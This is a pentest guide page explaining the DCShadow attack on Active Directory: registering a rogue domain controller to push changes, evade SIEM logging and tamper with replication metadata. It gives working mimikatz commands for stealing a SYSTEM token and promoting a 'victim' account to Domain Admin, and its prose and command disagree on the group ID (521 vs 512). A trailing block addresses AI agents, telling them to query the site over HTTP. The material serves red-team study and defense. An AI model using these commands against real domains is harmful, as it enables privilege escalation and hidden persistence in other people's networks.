# DCShadow

DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC). Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence.

The attacks is done using the following steps:

* registering the "DC" by creating 2 objects in the CN=Configuration partition and altering the SPN of the computer used.
* Pushing the data (triggered using DrsReplicaAdd, KCC or other internal AD events)
* Removing the object previously created to demote the DC

It is a post exploitation attack (also called domination attack) because it requires **domain admin** (or enterprise admin) privileges (hence you need enough privileges to create a rogue Domain Controller and push changes to the DC Active Directory objects.)

To perform the attack you need 2 mimikatz instances. One of the will start the RPC servers with SYSTEM privileges (you have to indicate here the changes you want to perform), and the other instance will be used to push the values. So download the fresh copy of Mimikatz and transfer to the compromised workstation. Open the CMD  with with system privileges. Use **!+** to register service and start with system privileges. Then use **!processtoken** to steal SYSTEM token from service running to fake Domain Controller.

In this case we are changing the user 's privileges from Domain User to Domain Admin. Lets change the **primaryGroupID** of **victim** to **521** (Domain Admin)

```
mimikatz1 (RPC servers)
!+
!processtoken
lsadump::dcshadow /object:victim /attribute:primaryGroupID /value=512
```

Open one more CMD with Domain Admin privileges. And type below command to push changes to Domain Controller.

```
mimikatz2 (push) - Needs DA or similar
lsadump::dcshadow /push
```

congratz&#x20;

Reference for more details as usual :

{% embed url="<https://www.dcshadow.com/>" %}

{% embed url="<https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/post-compromise-attacks/dcshadow.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.